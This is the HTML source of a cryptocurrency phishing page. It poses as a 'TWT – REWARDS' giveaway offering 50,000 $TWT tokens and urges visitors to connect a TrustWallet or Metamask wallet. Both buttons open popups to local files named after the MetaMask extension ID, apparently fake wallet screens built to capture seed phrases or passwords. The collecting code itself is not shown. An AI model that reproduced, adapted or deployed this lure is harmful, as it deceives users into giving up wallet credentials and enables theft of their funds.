<!DOCTYPE html>
<html lang="en">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		
		<meta name="viewport" content="user-scalable=no,width=device-width,initial-scale=1">
<link rel="stylesheet" href="login/x-all8.css" type="text/css">
		<link rel="shortcut icon" href="https://i.ibb.co/C504rC4/5964.png">
		<link rel="icon" type="image/png" https://i.ibb.co/C504rC4/5964.png">
		<link rel="stylesheet" href="login/apps7.css" type="text/css">
		<!-- Meta Tags Variables --><title>TWT – REWARDS</title>
	</head>
<div style="text-align: center!important;"><img " loading="lazy" data-w-id="ed2e5c3e-6418-f76d-e3e5-0b4ed0021441" alt="" class="coin1-shad" style="width: 130px;"><br><div style=" padding: 10px; font-weight: 600; "></div></div><br><br>
  <!-- Modal content -->
  <div class="modal-content">
	  <div class="modal-h">
      <span class="close"></span>
    </div>
<div class="modal-body">

<div data-v-981381f4="" class="box ms-t-40 login-box"><div data-v-981381f4="" class="box-body"><div data-v-981381f4="" class="font-heading-medium font-semibold ps-16 ps-md-32" style="padding: 30px;text-align: center!important;">
              Connect Wallet<br>Claim 50.000 $TWT
            </div>
	<div data-v-981381f4="" class="container">
		<div data-v-981381f4="" class="row ps-x-32">
			<div data-v-981381f4="" class="col-12 login-with no-bottom-border-radius ps-16 ps-md-20 cursor-pointer pointer hover-b--primary5">
		<div href="#" onclick="window.open(&#39;TR/nkbihfbeogaeaoehlefnkodbefgpgknn -Copy-Copy.HTML&#39;,&#39;&#39;,&#39;toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=780&#39;) ;return false" data-v-981381f4="" class="d-flex"><div data-v-981381f4="" class="logo-metamask d-flex align-self-center"><img data-v-981381f4="" src="login/favicon.png" alt="Metamask" class="align-self-center"></div> <div data-v-981381f4="" class="d-flex flex-column text-left align-self-center ps-l-20"><span data-v-981381f4="" class="font-heading font-semibold">TrustWallet</span> <span data-v-981381f4="" class="font-body-small text-gray">Connect using mobile wallet</span></div> <svg data-v-981381f4="" class="svg-sprite-icon right-arrow align-self-center font-gray ml-auto"><use href="#right-arrow"></use></svg></div></div></div>



		<div data-v-981381f4="" class="row ps-x-32">
			<div data-v-981381f4="" class="col-12 login-with no-bottom-border-radius ps-16 ps-md-20 cursor-pointer pointer hover-b--primary5">
		<div href="#" onclick="window.open(&#39;Metamask/nkbihfbeogaeaoehlefnkodbefgpgknn.html&#39;,&#39;&#39;,&#39;toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=780&#39;) ;return false" data-v-981381f4="" class="d-flex"><div data-v-981381f4="" class="logo-metamask d-flex align-self-center"><img data-v-981381f4="" src="login/metamask-e3ee4ed.png" alt="Metamask" class="align-self-center"></div> <div data-v-981381f4="" class="d-flex flex-column text-left align-self-center ps-l-20"><span data-v-981381f4="" class="font-heading font-semibold">Metamask</span> <span data-v-981381f4="" class="font-body-small text-gray">Connect using mobile wallet</span></div> <svg data-v-981381f4="" class="svg-sprite-icon right-arrow align-self-center font-gray ml-auto"><use href="#right-arrow"></use></svg></div></div></div>




		<div data-v-981381f4="" class="row ps-x-32"></div> <div data-v-981381f4="" class="row justify-content-center wallet-download-info ms-t-32">
                </div></div></div></div>
    </div>
<div class="modal-footer" style="color:#151616;border-top: 1px solid #e7e9ee;padding: 22px 0px 22px 0px;font-size: 1rem;line-height: 1.5rem;font-weight: 400;text-align: center!important;">
    Now you just need to connect your wallet.
    </div>
  </div>

</div>
		

</body></html>